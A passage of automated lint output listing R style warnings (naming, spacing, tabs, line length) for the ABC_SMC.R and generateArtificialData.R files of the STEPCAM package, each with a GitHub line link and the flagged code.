^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:17:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:206:17:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L206) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum;\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:24:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] = 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:40:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L209) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] = 1\n                                       ^\n```\n[R/ABC_SMC.R:211:24:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] =\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:40:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L211) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] =\n                                       ^\n```\n[R/ABC_SMC.R:212:13:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:27:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:13:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L216) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:216:14:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:34:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:21:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L222) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:222:22:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:224:13:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:38:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:242:54:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L242) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:245:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L245) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:9:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:32:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L246) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:249:27:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L249) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:249:27:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:250:20:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:251:20:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:20:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:61:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L262) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:266:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/ABC_SMC.R#L266) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"Can't stop at iteration 1 - please set stop_at_iteration to 2 if you only want to generate from the prior\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    